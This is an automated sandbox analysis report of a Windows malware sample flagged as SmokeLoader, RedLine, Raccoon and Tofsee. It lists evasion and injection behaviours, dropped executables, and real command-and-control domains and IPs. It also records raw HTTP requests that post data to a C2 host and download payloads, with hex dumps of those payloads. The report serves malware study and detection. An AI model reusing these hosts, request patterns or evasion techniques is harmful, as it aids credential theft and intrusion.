Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report pAWNholT8X.exe

Overview

General Information

Sample Name:pAWNholT8X.exe
Analysis ID:491658
MD5:fb45ecbfb0e13b103b6b1c583479a21d
SHA1:9cb9eead55f3b3f4847fd8f1bdd8d20ca46d9dc2
SHA256:d0426ed95048ec08395edddaaa1d3ccc7a3f769d4324195e1f075b16f462a4c6
Tags:CoinMinerexe
Infos:

Most interesting Screenshot:

Detection

Raccoon RedLine SmokeLoader Tofsee
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Yara detected Raccoon Stealer
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Yara detected Tofsee
Sigma detected: Copying Sensitive Files with Credential Data
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (window names)
Query firmware table information (likely to detect VMs)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses known network protocols on non-standard ports
Injects a PE file into a foreign processes
Contains functionality to inject code into remote processes
Deletes itself after installation
Tries to detect virtualization through RDTSC time measurements
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Found many strings related to Crypto-Wallets (likely being stolen)
Checks if the current machine is a virtual machine (disk enumeration)
PE file contains section with special chars
Hides threads from debuggers
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Machine Learning detection for dropped file
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
PE file contains sections with non-standard names
Yara detected Credential Stealer
Contains functionality to call native functions
PE file contains executable resources (Code or Archives)
Entry point lies outside standard sections
Creates a DirectInput object (often for capturing keystrokes)
AV process strings found (often used to terminate AV products)
PE file contains an invalid checksum
Detected TCP or UDP traffic on non-standard ports
Contains capabilities to detect virtual machines
Social media urls found in memory data
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • pAWNholT8X.exe (PID: 6436 cmdline: 'C:\Users\user\Desktop\pAWNholT8X.exe' MD5: FB45ECBFB0E13B103B6B1C583479A21D)
    • pAWNholT8X.exe (PID: 1068 cmdline: 'C:\Users\user\Desktop\pAWNholT8X.exe' MD5: FB45ECBFB0E13B103B6B1C583479A21D)
      • explorer.exe (PID: 3440 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • 6CB1.exe (PID: 3168 cmdline: C:\Users\user\AppData\Local\Temp\6CB1.exe MD5: 2616D3A90B92A23F31A0BA2508076DFC)
          • 6CB1.exe (PID: 6176 cmdline: C:\Users\user\AppData\Local\Temp\6CB1.exe MD5: 2616D3A90B92A23F31A0BA2508076DFC)
        • 757C.exe (PID: 5560 cmdline: C:\Users\user\AppData\Local\Temp\757C.exe MD5: 287976D8C62519CBB494CF31916CE26E)
          • conhost.exe (PID: 5608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • 757C.exe (PID: 6664 cmdline: C:\Users\user\AppData\Local\Temp\757C.exe MD5: 287976D8C62519CBB494CF31916CE26E)
        • 8433.exe (PID: 1292 cmdline: C:\Users\user\AppData\Local\Temp\8433.exe MD5: F853FE6B26DCF67545675AEC618F3A99)
          • conhost.exe (PID: 6740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • CEB6.exe (PID: 3504 cmdline: C:\Users\user\AppData\Local\Temp\CEB6.exe MD5: 8E50D7FBCC07F331637ABBAA2C6ED428)
          • conhost.exe (PID: 5620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • E52D.exe (PID: 6840 cmdline: C:\Users\user\AppData\Local\Temp\E52D.exe MD5: D0F8625E7557AE3CCC13440F3843515F)
        • FE25.exe (PID: 6296 cmdline: C:\Users\user\AppData\Local\Temp\FE25.exe MD5: CDDB8954B4839E0106963B050ED664EB)
        • 247A.exe (PID: 5332 cmdline: C:\Users\user\AppData\Local\Temp\247A.exe MD5: A8F923639F9B10392A12E409A4B65D80)
          • conhost.exe (PID: 6432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • E52D.exe (PID: 6424 cmdline: 'C:\Users\user\AppData\Local\Temp\E52D.exe' MD5: D0F8625E7557AE3CCC13440F3843515F)
        • 3DEF.exe (PID: 6164 cmdline: C:\Users\user\AppData\Local\Temp\3DEF.exe MD5: F5339FAB992D8D5DC0E4106FB8B5B899)
          • cmd.exe (PID: 4416 cmdline: 'C:\Windows\System32\cmd.exe' /C mkdir C:\Windows\SysWOW64\gelvdtot\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 2916 cmdline: 'C:\Windows\System32\cmd.exe' /C move /Y 'C:\Users\user\AppData\Local\Temp\dkwjsfga.exe' C:\Windows\SysWOW64\gelvdtot\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • E52D.exe (PID: 4760 cmdline: 'C:\Users\user\AppData\Local\Temp\E52D.exe' MD5: D0F8625E7557AE3CCC13440F3843515F)
  • svchost.exe (PID: 6672 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5768 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6856 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7044 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • ecrjwib (PID: 852 cmdline: C:\Users\user\AppData\Roaming\ecrjwib MD5: FB45ECBFB0E13B103B6B1C583479A21D)
    • ecrjwib (PID: 6780 cmdline: C:\Users\user\AppData\Roaming\ecrjwib MD5: FB45ECBFB0E13B103B6B1C583479A21D)
  • svchost.exe (PID: 5440 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000016.00000002.620551936.0000000000402000.00000040.00000001.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
    00000011.00000002.502575031.0000000003D51000.00000004.00000001.sdmpSUSP_Double_Base64_Encoded_ExecutableDetects an executable that has been encoded with base64 twiceFlorian Roth
    • 0xd33f8:$: VFZxUUFBT
    00000011.00000002.502575031.0000000003D51000.00000004.00000001.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
      00000023.00000002.626408703.0000000000400000.00000040.00020000.sdmpJoeSecurity_TofseeYara detected TofseeJoe Security
        00000013.00000002.620846054.0000000000303000.00000040.00020000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          Click to see the 13 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          20.1.6CB1.exe.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
            4.1.pAWNholT8X.exe.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
              20.2.6CB1.exe.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                4.2.pAWNholT8X.exe.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                  22.2.757C.exe.400000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                    Click to see the 3 entries

                    Sigma Overview

                    System Summary:

                    barindex
                    Sigma detected: Copying Sensitive Files with Credential DataShow sources
                    Source: Process startedAuthor: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community: Data: Command: 'C:\Windows\System32\cmd.exe' /C move /Y 'C:\Users\user\AppData\Local\Temp\dkwjsfga.exe' C:\Windows\SysWOW64\gelvdtot\, CommandLine: 'C:\Windows\System32\cmd.exe' /C move /Y 'C:\Users\user\AppData\Local\Temp\dkwjsfga.exe' C:\Windows\SysWOW64\gelvdtot\, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\3DEF.exe, ParentImage: C:\Users\user\AppData\Local\Temp\3DEF.exe, ParentProcessId: 6164, ProcessCommandLine: 'C:\Windows\System32\cmd.exe' /C move /Y 'C:\Users\user\AppData\Local\Temp\dkwjsfga.exe' C:\Windows\SysWOW64\gelvdtot\, ProcessId: 2916

                    Jbx Signature Overview

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection:

                    barindex
                    Yara detected Raccoon StealerShow sources
                    Source: Yara matchFile source: 0000001E.00000002.653738313.000000000114D000.00000002.00020000.sdmp, type: MEMORY
                    Antivirus detection for URL or domainShow sources
                    Source: http://geenaldencia9.top/Avira URL Cloud: Label: malware
                    Antivirus detection for dropped fileShow sources
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeAvira: detection malicious, Label: HEUR/AGEN.1106254
                    Multi AV Scanner detection for submitted fileShow sources
                    Source: pAWNholT8X.exeVirustotal: Detection: 36%Perma Link
                    Source: pAWNholT8X.exeReversingLabs: Detection: 40%
                    Machine Learning detection for dropped fileShow sources
                    Source: C:\Users\user\AppData\Local\Temp\CEB6.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\757C.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\FE25.exeJoe Sandbox ML: detected
                    Source: pAWNholT8X.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                    Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.6:49837 version: TLS 1.2
                    Source: Binary string: Z:\Development\Secureuser\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb source: 8433.exe
                    Source: Binary string: #fNC:\neziyotugi voyosededidi.pdb source: 6CB1.exe, 00000010.00000000.473271527.0000000000412000.00000002.00020000.sdmp
                    Source: Binary string: C:\neziyotugi voyosededidi.pdb source: 6CB1.exe, 00000010.00000000.473271527.0000000000412000.00000002.00020000.sdmp
                    Source: Binary string: C:\hebesolazo\fanelugiken.pdb source: pAWNholT8X.exe, 00000000.00000002.364281095.0000000000412000.00000002.00020000.sdmp, ecrjwib, 0000000F.00000000.461024163.0000000000412000.00000002.00020000.sdmp
                    Source: Binary string: )/C:\hebesolazo\fanelugiken.pdb source: pAWNholT8X.exe, 00000000.00000002.364281095.0000000000412000.00000002.00020000.sdmp, ecrjwib, 0000000F.00000000.461024163.0000000000412000.00000002.00020000.sdmp

                    Networking:

                    barindex
                    Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                    Source: TrafficSnort IDS: 2033973 ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download) 192.168.2.6:49843 -> 194.180.174.100:80
                    System process connects to network (likely due to code injection or exploit)Show sources
                    Source: C:\Windows\explorer.exeDomain query: nityanneron5.top
                    Source: C:\Windows\explorer.exeDomain query: lynettaram7.top
                    Source: C:\Windows\explorer.exeDomain query: umayaniela6.top
                    Source: C:\Windows\explorer.exeDomain query: jebeccallis4.top
                    Source: C:\Windows\explorer.exeDomain query: privacy-toolz-for-you-403.top
                    Source: C:\Windows\explorer.exeNetwork Connect: 216.128.137.31 80
                    Source: C:\Windows\explorer.exeDomain query: sadineyalas8.top
                    Source: C:\Windows\explorer.exeDomain query: naghenrietti1.top
                    Source: C:\Windows\explorer.exeDomain query: geenaldencia9.top
                    Source: C:\Windows\explorer.exeDomain query: kimballiett2.top
                    Source: C:\Windows\explorer.exeDomain query: xadriettany3.top
                    Uses known network protocols on non-standard portsShow sources
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 9080
                    Source: unknownNetwork traffic detected: HTTP traffic on port 9080 -> 49841
                    Source: global trafficHTTP traffic detected: GET /hcdrom1 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: t.me
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 132Host: 194.180.174.100
                    Source: global trafficHTTP traffic detected: GET //l/f/1pHWJnwB3dP17SpzF3sp/6cbf9ba43fa4774c97b7a910fd83e29808663306 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 194.180.174.100
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 27 Sep 2021 17:34:20 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38Last-Modified: Mon, 27 Sep 2021 17:34:02 GMTETag: "20000-5ccfd80bdc4c3"Accept-Ranges: bytesContent-Length: 131072Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 04 b3 00 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 02 01 00 00 48 09 00 00 00 00 00 2c 1b 00 00 00 10 00 00 00 20 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 70 0a 00 00 04 00 00 f1 c4 02 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 a0 51 01 00 4f 00 00 00 2c 49 01 00 3c 00 00 00 00 c0 09 00 f0 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 21 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 34 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 00 01 01 00 00 10 00 00 00 02 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 ef 31 00 00 00 20 01 00 00 32 00 00 00 06 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 7c 55 08 00 00 60 01 00 00 1e 00 00 00 38 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 a8 00 00 00 c0 09 00 00 aa 00 00 00 56 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 17:35:21 GMTContent-Type: application/octet-streamContent-Length: 916735Connection: keep-aliveLast-Modified: Wed, 01 Sep 2021 16:21:39 GMTETag: "612fa893-dfcff"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 17 19 74 5c 00 10 0c 00 12 10 00 00 e0 00 06 21 0b 01 02 19 00 5a 09 00 00 04 0b 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 70 09 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 b0 0c 00 00 06 00 00 1c 87 0e 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 c0 0a 00 9d 20 00 00 00 f0 0a 00 48 0c 00 00 00 20 0b 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 0b 00 bc 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 0b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 f1 0a 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 58 09 00 00 10 00 00 00 5a 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 fc 1b 00 00 00 70 09 00 00 1c 00 00 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 14 1f 01 00 00 90 09 00 00 20 01 00 00 7c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 b0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 9d 20 00 00 00 c0 0a 00 00 22 00 00 00 9c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 48 0c 00 00 00 f0 0a 00 00 0e 00 00 00 be 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 00 0b 00 00 02 00 00 00 cc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 10 0b 00 00 02 00 00 00 ce 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 20 0b 00 00 06 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 bc 33 00 00 00 30 0b 00 00 34 00 00 00 d6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 d8 02 00 00 00 70 0b 00 00 04 00 00 00 0a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 d8 98 00 00 00 80 0b 00 00 9a 00 00 00 0e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 f5 1a 00 00 00 20 0c 00 00 1c 00 00 00 a8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 80 1a 00 00 00 40 0c 00 00 1c
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 354Host: geenaldencia9.top
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 318Host: geenaldencia9.top
                    Source: global trafficHTTP traffic detected: GET /downloads/toolspab2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacy-toolz-for-you-403.top
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 126Host: geenaldencia9.top
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 352Host: geenaldencia9.top
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 348Host: geenaldencia9.top
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 287Host: geenaldencia9.top
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 271Host: geenaldencia9.top
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 191Host: geenaldencia9.top
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 252Host: geenaldencia9.top
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 118Host: geenaldencia9.top
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 307Host: geenaldencia9.top
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 269Host: geenaldencia9.top
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 173Host: geenaldencia9.top
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 122Host: geenaldencia9.top
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 170Host: geenaldencia9.top
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 258Host: geenaldencia9.top
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 140Host: geenaldencia9.top
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 203Host: geenaldencia9.top
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 124Host: geenaldencia9.top
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 321Host: geenaldencia9.top
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 115Host: geenaldencia9.top
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geenaldencia9.top/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 332Host: geenaldencia9.top
